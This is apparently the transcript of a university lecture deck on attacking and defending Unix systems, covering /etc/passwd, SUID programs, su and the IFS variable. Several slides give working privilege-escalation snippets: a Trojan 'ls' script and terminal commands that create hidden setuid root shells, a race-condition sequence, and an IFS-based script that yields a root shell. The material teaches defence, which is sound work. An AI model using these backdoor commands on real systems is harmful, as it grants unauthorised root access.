1 / 26

The Attack and Defense of Computers Dr. 許 富 皓

The Attack and Defense of Computers Dr. 許 富 皓. Passwords in Unix/Linux Systems. /etc/passwd. Format: Racehl : eH5/.mj7NB3dx : 181 : 100 : Rachel Cohen : /u/rachel : bin/ksh. home directory. uid. gid. user name. login shell. account name. encrpyted password. System Function Account.

guido
Télécharger la présentation

The Attack and Defense of Computers Dr. 許 富 皓

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. The Attack and Defense of Computers Dr.許 富 皓

  2. Passwords in Unix/Linux Systems

  3. /etc/passwd • Format: Racehl:eH5/.mj7NB3dx:181:100:Rachel Cohen:/u/rachel:bin/ksh home directory uid gid user name login shell account name encrpyted password

  4. System Function Account • Unix opens special accounts for a variety of system functions. (e.g. daemon/sys, ftp, nobody, uucp) • daemon:*:1:1: :/tmp: • ftp:*:3:3:FTP User:/usr/sool/ftp: • nobody:*:60001:60001::/tmp: • uucp:*:4:4::/usr/spool/uucppublic:/us/lib/uucp/uucico Prevent users from using login to log into the system. (not include trusted host/user; rlogin)

  5. Password Crackers • Download (1) • Download (2) • John the Ripper password cracker -- Linux • Ophcrack 2 -- Windows

  6. One Time Password • Password list • Small Card • Calculator

  7. UID, GID, and SUID

  8. Account Name and UID • UID 0  root. • A system identifies a user by her/his UID, not her/his name. • e.g. • Name: root, UID: 100  no root privilege • Name: doggy, UID: 0  root privilege • good habit: user name root should be preserved for system administrators. • Users with different user names but with the same UID are treated as the same user by the system.

  9. Real UIDs and Effective UIDs • A Unix process has at least these two IDs: • Real UID: • a process owner’s real identity and • matches up with the username the owner logged in as. • Effective UID: • a system decide a process’s privilege based on this ID. • Usually, the above two IDs of a process are the same.

  10. setuid or SUID program • When a suid program is run, the process involved takes on an efficitive UID that is the same as the owner of the file. • But the real UID remains the same as the one of the user that creates the process. • chmod 4xxx filename e.g. $ chmod 4757 program_name $ ls –al .. -rwsr-xrwx root user 16384 Sep 3 2005 program_name suid program indicator

  11. setuid Program examples • su • passwd

  12. Group • Each user belongs to a primary group that is stored in the /etc/passwd file. • The /etc/group file contains every group and its gid in a system. • vision:*:101:Keith,arlin,janice • users:*:100: • startrek:*:102:janice,karen,arlin • Each user can belong to several different groups, but her/his gid can be the gid of only one of the groups which she/he belongs to. • A user can use commandnewgrpto change her/his gid.

  13. su: Substitute User %whoami tim %su john Password: ******* %whomai john ======================================== %su Password:******** # whoami root # super user password new prompt

  14. Security Problem with su • Type /bin/su - cause the sub-shell to read all relevant startup files and simulate a login; therefore, the new shell uses the root’s environment variable, including PATH. 1) avoid Trojan horse (another program with the same name and in one of the directories listed in the PATH variable.) 2) The access right of the directory that contains the Trojan may not be set correctly.

  15. Stealing Superuser Account Assume: the root’s PATH variable is as follows: .:xxxxxxx Observation: When going into a directory, the first command a user types usually is ls. %cat ls #! /bin/sh cp /bin/sh ./stuff/junk/.superdude chmod 4555 ./stuff/junk/.superdude rm –f $0 exec /bin/ls ${1+”$@”} ==================================== %cd %chmod 700 . %touch ./-f A Trojan horse shell script with name ls. 1) Change the access right of the user’s home directory so that the victim must use root account to see the content of this directory. 2) Create a file named -f

  16. Account Steal by Passersby $ cp /bin/sh /tmp/break-acct $ chmod 4755 /tmp/break-acct When a user left her/his terminal unnoticed, then a bystander could create a backdoor easily by just typing the above commands.

  17. Shells and Shell Scripts

  18. Shell • Also called a command line interpreter. • When you login a system, it • displays a prompt on the screen and • waits for you to enter a commend. • A running shell is also a process. • Some of the famous shells • Bourne shell (/bin/sh) • Bourne Again shell (/bin/bash) • Korn Shell (/bin/ksh) • C-shell (/bin/csh)

  19. Shell Script • A shell script is series of commands written in plain text file. • In order to make a shell script executable, its file permission must be changed to executable. • Usually the first line of a shell script is as follows: • #! Shell , then followed by a series of commands

  20. Security Problems of SUID Shell Script • Two shells are involved in the execution of a shell script. • The shell that accepts the shell script command. • The shell that executes the shell script. • Race Conditon: $ cd /tmp $ ln /etc/setid_script temp $ nice -20 temp & $ mv my_script temp Between the time the kernel opens the file to see which interpreter to run, and when the (now-set-id) interpreter turns around and reopens the file to interpret it, an attacker might change the file (directly or via symbolic links). opened twice attack script

  21. IFSSecurity

  22. IFS Environment Variable • The IFS specifies which characters separate commands. • It is normally set to a space, tab, or new line.

  23. IFS and Shell Script Security • By changing the IFS, a hacker can change what programs our script executes. • Our script calls the /usr/bin/passwd program. • Changing the IFS to "/" with % export IFS='/' causes the script to no longer run /usr/bin/passwd, but instead run usr bin passwd. • Now a hacker can create a script called usr that generates a root shell.

  24. Security Hole in /usr/lib/preserve vi 3. preserve saves the edited file in a restricted area 1.telnet 2. disconnect 4. recover program reads the file from the area

  25. /usr/lib/preserveand /bin/mail • preserve was installed SUID root. • preserve ran /bin/mail as the root user to alert users that their files had been preserved. • preserve executed the mail program with the system() function call. According to the content of IFS to parse a string into command, options, and arguments

  26. Change IFS to Execute a Different Program/Script • If IFS=‘/’, then preserve will execute, bin mail instead of /bin/mail. • % cat bin • #! /bin/sh • cd /home/mydir/bin • cp /bin/sh ./sh • chown root sh • chmod 4755 sh

More Related